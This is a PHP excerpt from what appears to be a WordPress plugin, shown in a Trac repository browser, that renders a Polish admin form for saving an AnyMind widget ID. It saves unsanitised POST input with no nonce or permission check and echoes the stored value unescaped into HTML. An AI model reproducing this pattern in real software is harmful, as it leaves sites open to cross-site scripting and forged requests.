  function createDOMStructure() {

7

    if(array\_key\_exists('onSendWidgetId',$\_POST)) {

8

      update\_option('setWidgetId',$\_POST\['widget\_field'\]);

9

    }

10

11

    $\_widgetID \= get\_option('setWidgetId', '');

12

    ?>

13

    <div class="anymind-widget-form">

14

      <h2>Twój widget id: <span>(przycisk zawsze widoczny)</span></h2>

15

        <form method="post", action="">

16

17

            <div class="anymind-widget-form-widget\_\_input">

18

               <input type="text" id="anymind-widget-id" for="widget\_script" value="<?php echo $\_widgetID ?>" name="widget\_field">

19

               <input type="submit" value="Zapisz" name="onSendWidgetId">

20

            </div>

21

        </form>

22

    </div>

23

    <?php

24

    if(array\_key\_exists('onSendWidgetId',$\_POST)) {

25

      ?>

26

          <div class="anymind-widget\_\_alert anymind-widget\_\_alert--success">

27

            <p>Twoj WidgetID został dodany</p>

28

          </div>

29

      <?php

30

    }

31

  }

32

?>

**Note:** See TracBrowser for help on using the repository browser.

Tag

#php